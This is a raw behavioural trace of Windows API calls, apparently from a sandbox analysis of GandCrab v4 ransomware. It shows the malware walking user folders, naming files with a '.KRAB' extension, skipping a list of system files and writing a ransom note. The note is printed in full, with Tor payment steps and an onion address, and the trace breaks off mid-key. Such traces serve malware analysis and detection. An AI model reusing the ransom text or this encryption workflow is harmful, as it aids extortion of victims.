KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0057.529] WriteFile (in: hFile=0x448, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e5a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e5a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0057.530] CloseHandle (hObject=0x448) returned 1 [0057.530] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.531] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.531] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x4, wMilliseconds=0x2dd)) [0057.531] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.531] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0057.531] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0057.532] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\d2ca4a08d2ca4dee3d.lock") returned 109 [0057.532] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\dqqhjz8c\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x448 [0057.532] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.532] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.533] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\") returned 86 [0057.533] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\*" [0057.533] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\*", lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0xfbd3a0 [0057.533] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0057.533] FindNextFileW (in: hFindFile=0xfbd3a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0057.533] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0057.533] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0057.533] FindNextFileW (in: hFindFile=0xfbd3a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0057.533] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0057.533] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0057.533] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\d2ca4a08d2ca4dee3d.lock" [0057.533] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.533] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 114 [0057.533] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\d2ca4a08d2ca4dee3d.lock") returned 109 [0057.533] lstrlenW (lpString=".lock") returned 5 [0057.533] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.534] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0057.534] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.534] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.534] FindNextFileW (in: hFindFile=0xfbd3a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0057.534] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0057.534] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0057.534] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\KRAB-DECRYPT.txt" [0057.534] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.534] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\KRAB-DECRYPT.txt.KRAB") returned 107 [0057.535] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\KRAB-DECRYPT.txt") returned 102 [0057.535] lstrlenW (lpString=".txt") returned 4 [0057.535] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.535] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0057.535] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.535] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\KRAB-DECRYPT.txt") returned 102 [0057.535] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\KRAB-DECRYPT.txt") returned 102 [0057.535] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0057.535] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0057.535] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0057.535] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0057.535] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0057.535] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0057.535] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0057.536] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0057.536] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0057.536] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0057.536] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.536] FindNextFileW (in: hFindFile=0xfbd3a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0 [0057.536] FindClose (in: hFindFile=0xfbd3a0 | out: hFindFile=0xfbd3a0) returned 1 [0057.536] CloseHandle (hObject=0x448) returned 1 [0057.536] FindNextFileW (in: hFindFile=0xfbd8a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0057.536] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0057.537] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0057.537] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\KRAB-DECRYPT.txt" [0057.537] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.537] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\KRAB-DECRYPT.txt.KRAB") returned 98 [0057.537] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\KRAB-DECRYPT.txt") returned 93 [0057.537] lstrlenW (lpString=".txt") returned 4 [0057.537] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.537] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0057.537] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.537] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\KRAB-DECRYPT.txt") returned 93 [0057.538] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\KRAB-DECRYPT.txt") returned 93 [0057.538] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0057.538] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0057.538] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0057.538] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0057.538] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0057.538] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0057.538] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0057.538] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0057.538] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0057.538] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0057.538] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.538] FindNextFileW (in: hFindFile=0xfbd8a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0 [0057.538] FindClose (in: hFindFile=0xfbd8a0 | out: hFindFile=0xfbd8a0) returned 1 [0057.538] CloseHandle (hObject=0x440) returned 1 [0057.538] FindNextFileW (in: hFindFile=0xfbd360, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0057.538] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0057.538] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0057.538] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\d2ca4a08d2ca4dee3d.lock" [0057.539] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.539] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 90 [0057.539] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\d2ca4a08d2ca4dee3d.lock") returned 85 [0057.539] lstrlenW (lpString=".lock") returned 5 [0057.539] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.539] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0057.539] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.539] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.540] FindNextFileW (in: hFindFile=0xfbd360, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0057.540] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0057.540] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0057.540] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\KRAB-DECRYPT.txt" [0057.540] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.540] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\KRAB-DECRYPT.txt.KRAB") returned 83 [0057.540] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\KRAB-DECRYPT.txt") returned 78 [0057.540] lstrlenW (lpString=".txt") returned 4 [0057.540] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.540] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0057.540] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.541] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\KRAB-DECRYPT.txt") returned 78 [0057.541] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\KRAB-DECRYPT.txt") returned 78 [0057.541] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0057.541] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0057.541] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0057.541] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0057.541] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0057.541] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0057.541] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0057.541] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0057.541] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0057.541] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0057.541] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.541] FindNextFileW (in: hFindFile=0xfbd360, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0057.541] lstrcmpW (lpString1="macromedia.com", lpString2=".") returned 1 [0057.541] lstrcmpW (lpString1="macromedia.com", lpString2="..") returned 1 [0057.541] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpString2="macromedia.com" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com" [0057.541] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\" [0057.541] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0057.542] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0057.542] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0057.542] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0057.542] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0057.542] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.542] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.543] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\\\KRAB-DECRYPT.txt") returned 94 [0057.543] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0057.544] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO